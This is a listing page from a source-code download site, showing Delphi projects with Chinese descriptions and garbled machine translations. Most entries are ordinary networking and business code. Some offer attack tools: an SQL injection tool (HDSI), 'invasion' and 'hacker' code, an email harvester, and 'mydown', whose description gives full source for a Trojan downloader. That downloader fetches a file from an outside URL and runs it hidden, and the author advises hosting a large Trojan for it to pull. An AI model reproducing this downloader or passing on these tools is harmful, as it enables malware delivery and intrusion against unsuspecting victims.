CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - delphi code
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Search - delphi code - List
[
WinSock-NDIS
]
Mir2Delphi
DL : 0
传奇2客户端 Delphi代码-two legendary client Delphi code
Date
: 2008-10-13
Size
: 667.73kb
User
:
陈信良
[
WinSock-NDIS
]
电话自动应答机
DL : 0
DELPHI 生成电话自动应答机的原代码,请放心使用,我的感觉不错-automatic telephone answering machines of the original code, please rest assured that the use, I feel good
Date
: 2008-10-13
Size
: 214.15kb
User
:
安全员
[
WinSock-NDIS
]
HDSI3[1].0
DL : 0
编写语言 Delphi 7 --- --- 此代码可以任意分发或者修改 但是希望保留作者版权. HDSI 是一款SQL注入工具。相信大家都不会陌生的。 程序用到的第3方控件请大家自己去下载,网上都可以找到的. 顺祝邪恶八所有的成员在新的一年里一切顺利。 希望这一份代码能够帮助到一些需要帮助的人,顺便也希望大家体会一下写程序是多么 痛苦的一件事情。不要随便侮辱别人的作品。 顺便祝福:老婆永远快乐,幸福... (如果转载时觉得废话很多,那么我希望最后一句话能够被转发此源代码的人们保留) -prepared this 7 --- --- --- --- arbitrary code can be distributed or modify the author but wish to retain copyright. HDSI is a SQL injection tool. I believe we are not unfamiliar. Procedures used in the first three to control their own to please download, the Internet can be found. I wish all the evil eight members of the new year all the best. A source hope this can help some people in need of help. Incidentally we also hope to write a program to experience how painful a thing. Do not insult other people's works. Incidentally Blessing : My wife always happiness, well-being ... (if reproduced when many feel that nonsense. Well, I hope that the final sentence can be transmitted this source code to retain)
Date
: 2008-10-13
Size
: 803.71kb
User
:
张挖补
[
WinSock-NDIS
]
多线程网络传输
DL : 1
在盒子里得到了这么多朋友无私的帮助,真的表示感谢!看到很多朋友在寻求多线程网络传输代码,为此,从我开发的网络棋牌游戏中整理出这个献给大家:) 开发环境:Delphi7.0+WinXP,没用其他控件(除了Delphi自带的Indy) 使用协议:TCP/IP 客户端一次发送65000字节的包,服务端负责组装并处理数据粘连。 使用ReadBuffer(),Send()函数来接收发送Buffer内字节,这样作的目的是使程序具有更好的灵活性。你可以自定义Buffer内那些字节的含义,例如是字符串、图像、声音、命令等等。 文件的多线程读写采用windows内存映像技术。 关键的服务器处理函数IdTCPServer1Execute(AThread: TIdPeerThread)是非线程安全的。如果使用临界区,那么多线程将在这里串行执行,严重降低多线程效率。对此,我采用一个简单的办法,具体可以看程序。-be in the box so many friends selfless help and really grateful! Many friends in the search for multi-threaded network transmission code, for from my development of the network and dominoes game sorted out the dedicated people :) development environment : Delphi7.0 WinXP, useless other controls (except for the Delphi Indy own) use agreement : TCP / IP client to send a 65,000-byte packets, the server is responsible for assembling and processing data adhesion. Use ReadBuffer (), Send () function to receive this Buffer byte, for the purpose of this is to make procedures better flexibility. You can define Buffer byte within the meaning of those, such as strings, images, sounds, etc. order. The documents used to read and write multi-threaded windows memory mapping technology. Key server functio
Date
: 2008-10-13
Size
: 53.43kb
User
:
tom
[
WinSock-NDIS
]
聊天记录
DL : 0
delphi 编写的网络通信聊天源代码,对开发网络应用的朋友有帮助哦-prepared by the network communication chat source code, the development of network applications friends help oh
Date
: 2008-10-13
Size
: 505.51kb
User
:
yang
[
WinSock-NDIS
]
IPTeleCode
DL : 0
用Delphi写的 网络IP电话源代码 一些平时开发Delphi的技巧,和大家共享-write with Delphi IP telephony network source code to develop some peacetime Delphi skills, and share
Date
: 2008-10-13
Size
: 215.58kb
User
:
刘志刚
[
WinSock-NDIS
]
19997_random
DL : 0
随机序列号发生器(原代码):这个软件可以产生指定长度的序列号,并且可以格式化该序列号。是Delphi的原代码。 -random sequence generator (source) : The software can produce a specified length of the sequence, and can be formatted to the serial number. Delphi is the original code.
Date
: 2008-10-13
Size
: 222.86kb
User
:
姚紫欣
[
WinSock-NDIS
]
mydown
DL : 0
执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Date
: 2008-10-13
Size
: 1.4kb
User
:
韩冰
[
WinSock-NDIS
]
BTDemo
DL : 1
delphi实现的bt下载器示例程序,带全部源码和BT协议 包中文件说明: BTDemo.dpr, BTDemoF.pas, BTDemoF.dfm -- 一个简单的bt下载器,支持多个.torrent文件同时下载 btutils.pas -- 核心bt组件 DCP*.pas -- SHA算法源码(复制自DEC组件包) InetUtils.pas -- 提供Internet下载的函数库 SimpleSocks.pas -- socket组件(TCP) SortLists.pas -- 排序的List组件 ThreadTimer.pas -- 定时器与线程池 DelayLists.pas -- 一个延时5秒再释放Object的队列 FastShareMem.pas, MemPools.pas, ShareGlobals.inc -- 由ThreadTimer内部使用 Bit Torrent Specification.htm -- BT协议文档-realized bt download procedures for example, with all source code and BT agreement package documents : BTDemo.dpr, BTDemoF.pas. BTDemoF.dfm -- a simple bt downloader, supports multiple. torrent download documents btutils.pas -- the core components bt DCP *. pas -- SHA algorithm source code (copied from the DEC kits) InetUtils.pas -- providing Internet download library SimpleSocks.pas -- socket Group pieces (TCP) SortLists.pas -- Ranking List components ThreadTime r.pas -- and the timer thread pool DelayLists.pas -- a delay the release of another five seconds O return of the queue FastShareMem.pas, MemPools.pas. ShareGlobals.inc -- ThreadTimer internal use by Tor Bit rent Specification.htm -- BT agreement document
Date
: 2008-10-13
Size
: 56.88kb
User
:
vvyang
[
WinSock-NDIS
]
gongxiang
DL : 0
一个delphi 编写的简单入侵的源代码 适合初学者-a simple preparation of the invasion of the source code for beginners
Date
: 2008-10-13
Size
: 16.1kb
User
:
lzy
[
WinSock-NDIS
]
fzll
DL : 0
封装完成端口的类,及测试例子 delphi 源码-Packaging completed the port category, and testing source code examples delphi
Date
: 2008-10-13
Size
: 55.48kb
User
:
lzy
[
WinSock-NDIS
]
060404DELPHI
DL : 0
黑客编程代码DELPHI版,很实用的哦!~!~-hackers Delphi programming code version, very useful! ~! ~
Date
: 2008-10-13
Size
: 7.91kb
User
:
dsgsdg
[
WinSock-NDIS
]
emfdr_1_0
DL : 1
Delphi版的邮箱搜索程序源代码,功能如下: 可以在因特网上自动搜索邮箱 支持vbscript和javascript脚本语法 允许微调线路设置 允许代理设置/搜索层数设置/工作线程数设-Delphi version of the mail source code search procedures, functions as follows : on the Internet can automatically search and mail support vbscript script syntax allows javascript fine-tuning lines set up to allow Proxy Settings / Search floors set up / set up a few threads
Date
: 2008-10-13
Size
: 248.17kb
User
:
李伟
[
WinSock-NDIS
]
delphiRs232
DL : 1
delphi 与Rs232 串行通讯控制 soure code-delphi Rs232 serial communication with the control soure code
Date
: 2008-10-13
Size
: 8.45mb
User
:
陈小智
[
WinSock-NDIS
]
delphi-xml
DL : 0
delphi对XML基本操作,压缩包中有源代码及可执行程序-delphi basic operation of XML, compression package active and executable code
Date
: 2008-10-13
Size
: 203.22kb
User
:
althonggg
[
WinSock-NDIS
]
CPYchaoShiGuanLi
DL : 0
超市管理软件,可对进出商品管理。Delphi源代码。分服务端和客户端。-Supermarket management software, right out of Commodity Management. Delphi source code. The service and clients.
Date
: 2008-10-13
Size
: 1.55mb
User
:
Franky
[
WinSock-NDIS
]
ftp_Source_Delphi
DL : 0
Delphi开发的ftp源代码,已经有很多网站引用了该Source.-Delphi ftp source code, a number of websites quoting the Source.
Date
: 2008-10-13
Size
: 353.02kb
User
:
yf
[
WinSock-NDIS
]
delphiremotecontrol
DL : 0
一个使用DELPHI制作的用于远程控制的程序代码,界面还可以。-use of a Delphi production for remote control of the code, can also interface.
Date
: 2008-10-13
Size
: 2.52kb
User
:
就不说
[
WinSock-NDIS
]
联通短信平台源代码
DL : 0
中国联通短信平台源代码,delphi版,请大家参考一下,资源共享。-China Unicom SMS platform source code, delphi version, please refer to, the sharing of resources.
Date
: 2008-10-13
Size
: 16.01kb
User
:
我是谁
[
WinSock-NDIS
]
downdoor
DL : 0
文件下载器,运行后下载文件并运行,DELPHI代码-files for running after the download and run, Delphi code
Date
: 2008-10-13
Size
: 46.18kb
User
:
于皓
«
1
2
»
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.